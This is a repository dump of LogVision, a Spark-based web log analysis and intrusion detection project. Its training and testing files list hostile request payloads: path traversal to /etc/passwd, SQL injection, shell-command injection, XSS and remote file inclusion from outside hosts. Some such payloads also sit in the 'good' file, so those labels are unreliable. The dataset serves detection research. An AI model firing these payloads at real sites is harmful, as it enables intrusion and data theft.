Repository: xander-wang/logvision Branch: master Commit: 93b1eaae6c5a Files: 75 Total size: 70.1 MB Directory structure: gitextract_jksm79cg/ ├── .gitignore ├── README.md ├── datasets/ │ ├── access_log │ └── learning-datasets/ │ ├── testing/ │ │ ├── bad.txt │ │ └── good.txt │ └── training/ │ ├── bad.txt │ └── good.txt ├── flask/ │ ├── app.py │ ├── requirements.txt │ ├── static/ │ │ ├── css/ │ │ │ └── styles.css │ │ └── js/ │ │ └── echarts/ │ │ ├── echarts.js │ │ ├── extension/ │ │ │ ├── bmap.js │ │ │ └── dataTool.js │ │ └── map/ │ │ └── js/ │ │ ├── china.js │ │ └── world.js │ └── templates/ │ ├── about.html │ ├── analysis.html │ ├── id.html │ └── index.html ├── flume/ │ └── standalone.conf ├── log_gen/ │ └── log_gen.java └── spark/ ├── build.sbt ├── project/ │ ├── assembly.sbt │ ├── build.properties │ ├── project/ │ │ └── target/ │ │ └── config-classes/ │ │ └── $43a0538f7780cac449ae.cache │ └── target/ │ ├── config-classes/ │ │ ├── $16828faecf688d54d497.cache │ │ ├── $30003e6e888c6501d0a9.cache │ │ ├── $3d85af9b26c1a259b49e.cache │ │ ├── $46bc225346f5c722f39f.cache │ │ ├── $da50ce791668c9ed0f15.cache │ │ └── $f2cabef45cb06cd331f1.cache │ ├── scala-2.12/ │ │ └── sbt-1.0/ │ │ └── update/ │ │ └── update_cache_2.12/ │ │ ├── inputs │ │ └── output │ └── streams/ │ ├── _global/ │ │ ├── _global/ │ │ │ ├── _global/ │ │ │ │ └── streams/ │ │ │ │ └── out │ │ │ └── csrLogger/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── out │ │ ├── csrConfiguration/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── out │ │ ├── csrProject/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── out │ │ ├── dependencyPositions/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── update_cache_2.12/ │ │ │ ├── input_dsp │ │ │ └── output_dsp │ │ ├── ivyConfiguration/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── out │ │ ├── ivySbt/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── out │ │ ├── moduleSettings/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── out │ │ ├── projectDescriptors/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── out │ │ ├── scalaCompilerBridgeScope/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── out │ │ └── update/ │ │ └── _global/ │ │ └── streams/ │ │ └── out │ ├── compile/ │ │ ├── _global/ │ │ │ └── _global/ │ │ │ ├── compileBinaryFileInputs/ │ │ │ │ └── previous │ │ │ ├── compileOutputs/ │ │ │ │ └── previous │ │ │ ├── compileSourceFileInputs/ │ │ │ │ └── previous │ │ │ ├── dependencyClasspathFiles/ │ │ │ │ └── previous │ │ │ ├── discoveredMainClasses/ │ │ │ │ └── data │ │ │ └── managedSourcePaths/ │ │ │ └── previous │ │ ├── compile/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── out │ │ ├── compileIncremental/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ ├── export │ │ │ └── out │ │ ├── copyResources/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ ├── copy-resources │ │ │ └── out │ │ ├── dependencyClasspath/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── export │ │ ├── exportedProducts/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── export │ │ ├── externalDependencyClasspath/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── export │ │ ├── internalDependencyClasspath/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── export │ │ ├── managedClasspath/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── export │ │ ├── unmanagedClasspath/ │ │ │ └── _global/ │ │ │ └── streams/ │ │ │ └── export │ │ └── unmanagedJars/ │ │ └── _global/ │ │ └── streams/ │ │ └── export │ └── runtime/ │ ├── dependencyClasspath/ │ │ └── _global/ │ │ └── streams/ │ │ └── export │ ├── exportedProducts/ │ │ └── _global/ │ │ └── streams/ │ │ └── export │ ├── externalDependencyClasspath/ │ │ └── _global/ │ │ └── streams/ │ │ └── export │ ├── fullClasspath/ │ │ └── _global/ │ │ └── streams/ │ │ └── export │ ├── internalDependencyClasspath/ │ │ └── _global/ │ │ └── streams/ │ │ └── export │ ├── managedClasspath/ │ │ └── _global/ │ │ └── streams/ │ │ └── export │ ├── unmanagedClasspath/ │ │ └── _global/ │ │ └── streams/ │ │ └── export │ └── unmanagedJars/ │ └── _global/ │ └── streams/ │ └── export ├── src/ │ └── main/ │ └── scala/ │ ├── learning.scala │ └── streaming.scala └── target/ └── streams/ └── _global/ └── _global/ └── checkBuildSources/ └── _global/ ├── inputFileStamps/ │ └── previous └── streams/ └── out ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ # Python __pycache__/ *.py[cod] *$py.class *.so .Python build/ develop-eggs/ dist/ downloads/ eggs/ .eggs/ lib/ lib64/ parts/ sdist/ var/ wheels/ *.egg-info/ .installed.cfg *.egg MANIFEST .pytest_cache/ # Vue/Node node_modules/ npm-debug.log* yarn-debug.log* yarn-error.log* .DS_Store dist/ .env .env.local .env.*.local *.log logs/ # IDE .idea/ .vscode/ *.suo *.ntvs* *.njsproj *.sln *.sw? # 系统文件 Thumbs.db ehthumbs.db Desktop.ini ================================================ FILE: README.md ================================================ # LogVision / 使用大数据的分布式实时日志分析与入侵检测系统 [开发文档](https://xander-wang.github.io/2020/05/09/logvision/) ## 版本记录(当前2.0) - 2018.12.8 v1.0:原型版本,有bug。 - 2020.5.9 v2.0:初步完善版本,可以实现预期效果。 ## 问题交流 - Telegram群组:https://t.me/logv123 ## 简介 LogVision是一个整合了web日志聚合、分发、实时分析、入侵检测、数据存储与可视化的日志分析解决方案。聚合采用Apache Flume,分发采用Apache Kafka,实时处理采用Spark Streaming,入侵检测采用Spark MLlib,数据存储使用HDFS与Redis,可视化采用Flask、SocketIO、Echarts、Bootstrap。 本文下述的使用方法均面向单机伪分布式环境,你可以根据需求进行配置上的调整以适应分布式部署。 本系统各模块由个人独立开发,期间参考了一些有价值的文献与资料。本系统还是个人的本科毕业设计。 获得的奖项:2019年全国大学生计算机设计大赛安徽省二等奖、2019年安徽省信息安全作品赛二等奖。 [原型版本的介绍视频](https://www.bilibili.com/video/BV1eb411T77r) ## 系统架构 ![arch](https://github.com/xander-wang/logvision/blob/master/images/arch.png) ## 数据流向 (数字代表处理步骤) ![dataflow](https://github.com/xander-wang/logvision/blob/master/images/dataflow.png) ## 入侵检测流程 ![idsflow](https://github.com/xander-wang/logvision/blob/master/images/idsflow.png) ## 项目结构 - flask:Flask Web后端 - spark:日志分析与入侵检测的实现 - flume:Flume配置文件 - log_gen:模拟日志生成器 - datasets:测试日志数据集 - images:README的图片 ## 依赖与版本 - 编译与Web端需要用到的: - Java 8, Scala 2.11.12, Python 3.8 (包依赖见requirements), sbt 1.3.8 - 计算环境中需要用到的: - Java 8, Apache Flume 1.9.0, Kafka 2.4, Spark 2.4.5, ZooKeeper 3.5.7, Hadoop 2.9.2, Redis 5.0.8 ## 使用说明 在开始之前,你需要修改源码或配置文件中的IP为你自己的地址。具体涉及到flume配置文件、Spark主程序、Flask Web后端。 ### 编译Spark应用 在安装好Java8与Scala11的前提下,在```spark```目录下,初始化```sbt```: ``` sbt ``` 退出```sbt shell```并使用```sbt-assembly```对Spark项目进行编译打包: ``` sbt assembly ``` 然后将生成的```jar```包重命名为```logvision.jar```。 ### 环境准备 你需要一个伪分布式环境(测试环境为CentOS 7),并完成了所有对应版本组件依赖的配置与运行。 使用```flume```目录下的```standalone.conf```启动一个Flume Agent。 将```datasets```文件夹中的```learning-datasets```提交如下路径: ``` /home/logv/learning-datasets ``` 将```datasets```文件夹中的```access_log```提交如下路径: ``` /home/logv/access_log ``` ### 入侵检测模型训练与测试 提交```jar```包至Spark集群并执行入侵检测模型的生成与测试: ``` spark-submit --class learning logvision.jar ``` 你将可以看到如下结果: ![idoutput](https://github.com/xander-wang/logvision/blob/master/images/idoutput.png) 两个表格分别代表正常与异常数据集的入侵检测结果,下面四个表格可用于判断识别准确率。如图中所示250条正常测试数据被检测为250条正常,识别率100%;250条异常测试数据被检测为240条异常,10条正常,准确率96%。 ### 启动可视化后端 在```flask```目录下执行如下命令,下载依赖包: ``` pip3 install -r requirements.txt ``` 启动Flask Web: ``` python3 app.py ``` ### 启动实时日志生成器 ```log_gen```中的实时日志生成器可根据传入参数(每次写入行数、写入间隔时间)将样本日志中的特定行块追加至目标日志中,以模拟实时日志的生成过程,供后续实时处理。 ``` java log_gen [日志源] [目标文件] [每次追加的行数] [时间间隔(秒)] ``` 提交至环境,编译并运行,每2秒将```/home/logv/access_log```文件中的5行追加至```/home/logSrc```中: ``` javac log_gen.java java log_gen /home/logv/access_log /home/logSrc 5 2 ``` ### 启动分析任务 提交```jar```包至Spark集群并执行实时分析任务: ``` spark-submit --class streaming logvision.jar ``` ### 查看可视化结果 至此你已经完成了后端组件的配置,通过浏览器访问Web端主机的```5000```端口可以查看到实时日志分析的可视化结果: 欢迎界面: ![welcome](https://github.com/xander-wang/logvision/blob/master/images/welcome.png) 实时日志分析界面: ![analysis](https://github.com/xander-wang/logvision/blob/master/images/analysis.png) 实时入侵检测界面: ![id](https://github.com/xander-wang/logvision/blob/master/images/id.png) ================================================ FILE: datasets/access_log ================================================ [File too large to display: 40.3 MB] ================================================ FILE: datasets/learning-datasets/testing/bad.txt ================================================ alert(1)//0
XXX
XXX
// O10.10↓, OM10.0↓, GC6↓, FF // IE6, O10.10↓, OM10.0↓ // IE6, O11.01↓, OM10.1↓ ]>&x; ]> XXX
x
&x;
PRESS ENTER
[A]">">">[B]">[C][D]<% foo>
X
X
alert(1)
X
XXX XXX `><img src=xx:x onerror=alert(1)></a>`><img src=xx:x onerror=alert(2)//`><img src=xx:x onerror=alert(3)// /top.php?stuff='|sleep 11 # /8t9v8k7x.jspa? /prescription/ ../../../../../../../../../../boot.ini /examples/jsp/checkbox/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl /ghswfouu.cfc? /u95h6ymu.cgi? /nyjgaorz.idc? /h4bi26jd.mscgi? /ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /en-us/w4996nr0.mscgi? /opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/frznctvhi0i5?\x00 /recordings/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00 /ghswfouu.fts? /0rufe52p.htm? /manager/forum_2.php?msg=10&return= /scripts/1332010202-ror_session_fixation.nasl /zqqemp6j.aspx? /javascript/proto.exe /awstats/awstats.pl?migrate=|echo;/./tmp/dedvphbiqt.sh;echo|awstats168582.txt /examples/jsp/colors/athenareg.php?pass= ;id /recordings/index.php?include_files[]=&include_files[query_string]=/etc/passwd /apavxugx.dll? /cgi-perl/vssetcookie.exe /phpmyadmin/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\x00 /help.php?q="&ver\x09>q66374774&rem\x09 /gvx7m5ti.asp? /cgi-bin/sawmillcl.exe?ho+{complete_version} /cgi-bin/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00 /main.php?logout="uname\x09# /ap58k3ci.kspx? /examples/jsp/colors/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\x00 /sourceforgesubscriptions_final/ /nuh3zirz.cfm? /bmeun223.exe? /examples/jsp/colors/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd /en-us/fo564rei.jsp? /cgi.cgi/c32web.exe/changeadminpassword /help.php?q=ping;-w;10000;-n;1;1.2.3.4&rem; /examples/jsp/num/resetpw.php?email=../../../../../../../../../../../../etc/passwd /oie504mr.html? /examples/jsp/colors/lib/authform.inc.php?path_pre=/etc/passwd\x00 /main.php?stuff="&del\x09q89486418&rem\x09 /archive.php?scriptpath=http://192.168.202.118:8080/ghl9il?? /examples/jsp/cal/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /examples/jsp/cal/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00 /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/yrxsovftek" /examples/servlets/servlet/js/scripts.php?load=/etc/passwd\x00 //../../../../../../../../windows/win.ini /javascript/manifest.exe /msadm/site/index.php3?authid=\"> /help.php?q=;uname\x09# /top.php?stuff='&rm q76213281 # /opensiteadmin/scripts/classes/formmanager.php?path=http://cirt.net/rfiinc.txt?\x00 /demo/ms-pe02/catalog.php?cid=0&sid='"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.96:8080/llumt7msyau5y?& /4×4/ /main.php?stuff="ping\x0b-w\x0b11000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b /dda2qr7j.exe? /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/&frm_user=&scr_height=&scr_width=q13664242 /scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919008,1645922045 -- /main.php?logout='&del\x09q59435268\x09# /en-us/account/print.php?what=article&id=' /examples/jsp/error/minis.php?month=../../../../../../etc/passwd /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+w+0+>>ctdn /recordings/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /examples/servlets/servlet/index.php?act=arcade&do=stats&gameid=1' /scripts/check-lom.php?etcdir=http://cirt.net/rfiinc.txt? /javascript/document.key /h5sc3gxy.dll? /? /javascript/vbs.exe /scripts/c0kha6w3apd3.shtml /egaet53a.html? /scripts/ibill.pm /nuh3zirz.nsf? /scripts/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\x00 /1qwv2p5p.do? /main.php?logout="&ping\x0b-w\x0b8000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b /javascript/oauth.exe /jujgxwav.fts? /scripts/minis.php?month=../../../../../../etc/passwd /fastscripts/ // /ygkjkngd.php? /main.php?stuff="rm,q47628643&rem, /examples/jsp/num/smpwservicescgi.exe /vhzmaia2.html? /hjdzm96v.jsp? /zroo33l4.asp? /main.php?stuff="\x0duname # /searchsimple.php?searwords=&send=search /fo564rei.cgi? /script-r0/ /examples/jsp/sessions/mlog.html?screen=/etc/passwd /opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/llumt7msyau5y?\x00 /javascript/encode.exe /en-us/7o5qp766.nsf? /d44uk9h2.idc? /weq93ppb.fts? /nyjgaorz.htm? /eguestproxsssql/ /scripts/admin/connect.inc / /examples/jsp/num/forumdisplay.php?fid=21"> /scripts/search.jsp?q=%" /cgi-bin/csguestbook.cgi?command=savesetup&setup=;system('cat /etc/passwd') /include/scripts/run_auto_suspend.cron.php?dir=http://cirt.net/rfiinc.txt? /vac1l5vm.pl? /examples/servlets/servlet/shopexd.asp?catalogid='42 /javascript/.passwd.jar /cgi-bin/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd| /rpxyx07v.jsp? /0rufe52p.jsp? /phpmyadmin/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00 ftp://192.168.24.202/* /vjbrrppi.cfc? /javascript/phpbb.exe /static//.../.../.../.../.../.../.../.../windows/win.ini /javascript/htpasswd.key /weq93ppb.x? /javascript/shipped.exe /cgi-bin/base_local_rules.php?dir= /wiki.php/ /examples/jsp/error/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00.txt /javascript/trash.exe /yver8r9o.php3? /manager/nessus">/ /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/frznctvhi0i5?? /jackrabbit/search.jsp?q=%" /main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd /0qhcnefz.htm? /7dbjwpw6.php? /examples/servlets/servlet/cwmail.exe /examples/jsp/colors/starnet/addons/slideshow_full.php?album_name='1914620104 /jnt3f86c.asp? /manager/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_wk4aztya]));die;/* /6dlc2zm9.jsp? /examples/jsp/checkbox/simple/view_page?mv_arg=|cat /etc/passwd| /cacti/base_qry_common.php?base_path=/etc/passwd\x00 /recordings/index.php?gadget=glossary&action=view&term= /cacti/search.cgi?..\..\..\..\..\..\windows\win.ini /0u75ldxq.htm? /top.php?stuff="&ping\x0c-w\x0c7000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /? /main.php?stuff=;uname >q81835212 # /main.php?stuff="ping -w 9000 -n 1 1.2.3.4&rem /javascript/webmail.exe /ripscript/ /examples/jsp/jsp2/el/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\x00 /help.php?q=ping;-w;7000;-n;1;1.2.3.4|rem; /www/delivery/ac.php?bannerid=-1331909226+or+1=1+--+';passthru(base64_decode($_server[http_nessus_1wubmpss]));die;/* /3hlysl2x.kspx? /main.php?stuff=&ver\x09>q65268393&rem\x09 /examples/jsp/jsp2/el/index.php?show=../../../../../../../../../../../etc/passwd\x00 /5qnlm5z2.php3? /bxnyrhmh.php3? /cacti/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd /5o9zq43e.asp? /yver8r9o.php? /scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 911180970,2,397451365,4,5,6,7,8,9,0,1,2,3 -- /interface/login/login_frame.php?site=' and '1'='1 /help.php?q="\x0duname\x09>q41994252\x09# /cacti/lang/lang.php?lang_path=/etc/passwd\x00 /ghostscript/ /ybz5rz7a.asp? /auth-passwd/ /606wkcop.htm? /top.php?stuff='&sleep\x0910\x09# /t_scriptrap/ /examples/jsp/num/hw3.cgi?daysonly=0).system('id').( /7o5qp766.cgi? /index.php?id=' /misc/audio.php?recording=../version.inc /main.php?stuff="ver&rem\x0c /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/fphgokkkuu.sh'); function v /phpmyadmin/calendar_admin.pl?config=|cat /etc/passwd| /base_local_rules.php?dir= /cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331919219','5'-- /p043snfr.cgi? /login.php?procesa=si&usuario_nkads_admin=' or isnull(1/0)/* /h5sc3gxy.nsf? /d44uk9h2.x? /javascript/www1.exe /recordings/styles.php?toroot=/etc/passwd\x00 /note.txt?f_notini=&t_note=&nomentreprise=blah&filenote=../../windows/win.ini /fo564rei.idc? /0w155a7c.idc? /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/augpuxhmyg.sh'); function v /header_noscript/ /..\..\\..\..\\..\..\\..\..\boot.ini /examples/jsp/jsp2/jspx/sgdynamo.exe?htname=sgdynamo.exe /raanw4ia.exe? /main.php?logout='del q43392461 # /examples/jsp/error/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd ================================================ FILE: datasets/learning-datasets/testing/good.txt ================================================ /jan carbon - creamfields/ /javascript/ns.sh /uhs reader v6/ /warez-downloads/ /issue10-news6/ /000044486/ /ncsspanish/ /145392/ /438085596epeigc_th/ /gr2006110301296/ /javascript/tcl.java /powhome/ /foxy_information/ /complaincheck/ /bloodmoon/ /newingames/ /javascript/templates.sh /javascript/env.err /javascript/apple.jsp /room/save_item.php /hurrflood_l/ /view_172/ /000095927/ /pressreleases24/ /pyamazon/ /4351660/ /content/content.php?fileloc=http://192.168.202.96:8080/frznctvhi0i5?? /topnav_10/ /rfdump-1/ /rx7hh71uzqi/ /logopcmag/ /kijijilogo_26x13/ /aboutefa/ /index85465/ /unreal/ /1704toc/ /455007/ /15_11a/ /bolkestein/ /162099/ /javascript/tip.cpp /1463_thumb stripyhat/ /dvdfab platinum 2/ /class.mysql.php?path_to_bt_dir=http://192.168.202.118:8080/iroy1gvqrrqu? /5099076/ /r36w71hyn09xx/ /susandelucanyt/ /20030407/ /4087505/ /costers/ /141234/ /rfc2518/ /lib/smarty/smartyfu.class.php?system[smarty][dir]=http://cirt.net/rfiinc.txt?? /fairly/ /javascript/it.cfm /000118956/ /gobblet/ /107170/ /262818/ /8122rca/ /thinkingaloud/ /mzk1mdu6ntoznq/ /hjmccmrd /10509770/ /blizkrieg/ /1154741/ /20060302-1/ /intentionality/ /redirect_cnews/ /javascript/technology.mdb /examples/jsp/sessions/search?q=http://www.nessus.org/ /file_fuzzers/ /044925/ /q52586735 /usgraham110206ind/ /sudoku-solver/ /jihad7chap1/ /up70dark/ /alticity/ /550983566ymtadz/ /om51dr/ /singertreadle/ /native2/ /savagethebattlefornewerthv2/ /msaccess/ /bmp/setconn.jsp /javascript/imp.vbs /marisa/ /general_electric/ /press7/ /ac67226ed451990431f317a88b31933f/ /nwqthhrld/ /eestor_ultracap/ /javascript/excalibur.java /slet-j/ /javascript/synced.nsf /do the crawl/ /javascript/pages.meta /a0034773/ /cnc_pred1/ /c77bfd/ /default_fr/ /img_3909159/ /donkey kong bongo blast_information/ /177749/ /dload-archiveoff/ /javascript/publications.csproj /000095041/ /administrator/menu_operation.php?site_absolute_path=http://192.168.202.118:8080/moclyxlwqyfjnp?? /futabamagnum/ /javascript/dirs.dll /betablockmodules/imagesmediagallerymodule/imagesmediagallerymodule.php?current_blockmodule_path=http://192.168.202.96:8080/4dckqcc0acprbz? /fonctions/template.php?repphp=http://192.168.202.118:8080/zz5thkvtmlgl?? /javascript/base.save /inc/shows.inc.php?cutepath=http://192.168.202.96:8080/txenjrxf3?? /przyroda/ /nyhedsbreve/ /1004359116/ /decisionpro_4/ /spamwalllogo2big/ /tolerate/ /000123583/ /27099_thumb/ /footer20/ /printer_46810/ /javascript/saml.tgz /20030418/ /javascript/hourly.csv /imagepreunmultiplier/ /vgrnep/ /footerleftcol_white/ /javascript/faq.jsf /programmer-jobs/ /javascript/item.o /javascript/ep.php /sb116589968303947412/ /index.php?phpbb_root_path=http://192.168.202.118:8080/2aibfaczmac8? /alert-nimda/ /000113331/ /nethome.dat /installation-services/ /yrcjzcjjnl/ /000078106/ /img_0941/ /000044436/ /6163215/ /zachman2/ /development_prerequisites/ /javascript/schedule.ws /19991115/ /javascript/employees.trace /_private/ /93218036/ /178361/ /celebrity big brother uk/ /168775/ /119196/ /javascript/body.tar /box6_rt/ /128967/ /warehouse-r0/ /djfzmsdl72/ /activitiesandinterests/ /flathead1/ /ibiz usps integrator activex vb edition v1/ /a1 jummfa audio converter v5/ /featureddt/ /pdficon/ /c161199f/ /pokermaster/ /sld011/ /20041112-5/ /box_full/ /javascript/sfish.vbs /javascript/poll.asmx /activerecord/ /panasonic_nvgs180/ /imovietheater134/ /samueljohnson/ /gogomini79/ /ad_hedl/ /negligent_gifts/ /apachessl/ /mother_child/ /javascript/crons.properties /javascript/asp.dump /keep_away/ /javascript/manifest.jsf /041031/ /104938/ /q95899945 /splatter/ /191059/ /javascript/secured.conf /javascript/automation.key /hacker-personals/ /dirtyharrys_crosshair/ /info_698/ /134320/ /jbruneau/ /mmounteer/ /javascript/opengts.yml /pathwaytogrowthjobs03172005/ /john_hiatt/ /200754/ /download-001005050/ /spam-abuse/ /butylarz/ /aib_corstudy/ /cms/meetweb/classes/managerresource.class.php?root_path=http://192.168.202.96:8080/4dckqcc0acprbz? /whp0012us_hpc/ /sploitcast_010/ /javascript/cpadmin.xslt /2451740/ /ashampoo uninstaller 2000 2/ /javascript/ls.ora /usb_keylogger/ /javascript/link.php3 /dhcp_rel/ /aamn-5ej3p4/ /javascript/rules.rtf /004577/ /canon_mvx350i/ /javascript/project.db /javascript/prv.7z /javascript/osc.xslt /javascript/signoff.meta /pacosporturbanjeans/ /dnccellphones/ /phplib/site_conf.php?ordnertiefe=http://192.168.202.118:8080/tzhfyzkbomspvm? /040469/ /profstc/ /111205/ /155042/ /162981/ /madgamer01/ /javascript/encode.bat /rigiconeditorial2/ /templates_club/ /irani02/ /javascript/07.tpl /dl6812/ /javascript/low.lib /journ2/ /bcci-1/ /3034511/ /182065/ /158818/ /javascript/labs.key /116216/ ================================================ FILE: datasets/learning-datasets/training/bad.txt ================================================ /top.php?stuff='uname >q36497765 # /h21y8w52.nsf? /ca000001.pl?action=showcart&hop=\">&path=acatalog/ /scripts/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; /javascript/mta.exe /examples/jsp/colors/kernel/loadkernel.php?installpath=/etc/passwd\x00 /examples/jsp/cal/feedsplitter.php?format=../../../../../../../../../../etc/passwd\x00&debug=1 /phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd /cgi-bin/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine= /examples/jsp/cal/search.php?allwords=
&cid=0&title=1&desc=1 /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+4d+5a+50+00+02+00+00+00+04+00+0f+00+ff+ff+00+00+b8+00+00+00+00+00+00+00+40++>>esbq /examples/jsp/colors/workarea/contentdesigner/ekformsiframe.aspx?id="> /id;1627282494;fp;2;fpid;1/ /.do /bmeun223.exe? /htbin/windmail.exe / /javascript/.passwd.jpg /opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.118:8080/ghl9il?\x00 /examples/jsp/jsp2/el/search= /javascript/signer.exe /help.php?q="&del\x0bq26193259&rem\x0b /c'hoario\xc3\xb9/ /main.php?logout="&del\x0cq31768299&rem\x0c /\xd0\x97\xd0\xb4\xd0\xbe\xd1\x80\xd0\xbe\xd0\xb2'\xd1\x8f/ /themes/modern/user_style.php?user_colors[bg_color]=" /nyjgaorz.mscgi? /cgi-bin/index.php?op=default&date=200607' union select 1,501184215,1,1,1,1,1,1,1,1--&blogid=1 /scripts/cfooter.php3 /en-us/dda2qr7j.fts? /? /169okeyj.jspa? /j734qobz.aspx? /examples/jsp/error/forum.php?do=viewtopic&cat=1&topic=1&page=1?alert('vulnerable'); / /cacti/base_local_rules.php?dir= /scripts/comersus_customerregistrationform.asp /cgi-bin/search.pl?form=../../../../../../etc/passwd\x00 /help.php?q='uname >q23433168 # /u8yiqilu.jsp? /scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1376526276-- /core/adodb/server.php?sql='adodb_sql_sql_injection.nasl /xsqln7eb.aspx? /u8yiqilu.dll? /5o9zq43e.cfm? /manager/cgi/tseekdir.cgi?location=/etc/passwd\x00 /qhvu0pdg.fts? /scripts/lsg2.cgi /1r8cfrlf.exe? /scripts/misc/audio.php?recording=../version.inc /javascript/.passwd.php3 /.idc /learnvbscript/ /main.php?logout="\x0duname # /recordings/usrdetails.php?sgnuptype=csaleid /javascript/emea.exe /8t9v8k7x.exe? /examples/jsp/error/include/error/autherror.cfm?errorcode=1&ftvar_linkp="> /examples/jsp/colors/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd /cgi-bin/type.asp?itype='duware_itype_sql_injection.nasl /help.php?q="del q66737251 # /dslpwt15.fts? /lsoix5h3.aspx? /chef's_knives/ /starnet/addons/slideshow_full.php?album_name='288150554 /examples/jsp/num/index.php?id='union/**/select/**/0,0,1369222205,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /scripts/search.scr.php?globals[pth][classes]=http://192.168.202.118:8080/tzhfyzkbomspvm?? /mpcgi/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html /main.php?logout="rm q61955456&rem /scripts/w04ukbv54ixz.cfm /postscriptbarcode/ /javascript/htpasswd.exe /javascript/mod.exe /containsscript/ /help.php?q=;del q94314237 # /scripts/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /tera patrick - farmer's daughter/ /cgi-sys/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd /bxnyrhmh.cgi? /scripting languages/ /cgi-local/a1disp3.cgi?../../../../../../../../../../etc/passwd /bxnyrhmh.cfc? /javascript/warez.exe /scs86g1p.cfm? /scripts/search.scr.php?globals[pth][classes]=http://192.168.202.96:8080/4dckqcc0acprbz?? /tuwjta1w.x? /pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://192.168.202.118:8080/ghl9il? /cacti/javascript.php?abs_path=/etc/passwd\x00 /en-us/n9xlumt5.x? /bb-hist.sh?histfile=../../../../../etc/passwd /cgi-bin/view_user.php?list=1&letter=&sort_by='select / /scripts/readme.txt /ybz5rz7a.pl? /javascript/backup.exe /javascript/htpasswd.cgi /phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1;/bin/id /rv98iwjp.php? /scripts/forum.php?do=viewtopic&cat=1&topic=1&page=1?q64815511 # /xfkun1ku.jspa? /examples/jsp/checkbox/bandwidth/index.cgi?action=showmonth&year=&month= /oie504mr.cfc? /opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\x00 /manager/index.php?selskin=../inc/boxleft.inc\x00&xposbox[l][]=/etc/passwd\x00 /iktok2bw.cfm? /help.php?q=del;q81588837&rem; /en-us/dda2qr7j.idc? /javascript/~eric.exe /scripts/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini /cgi-914/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe /manager/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@ /acart2_0/signin.asp?msg= /cgi-bin/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\x00 /read.php?pagenum_rsread=1&totalrows_rsread= /help.php?q='rm\x09q87915929\x09# /recordings/calendar.php?serverpath=/etc/passwd\x00 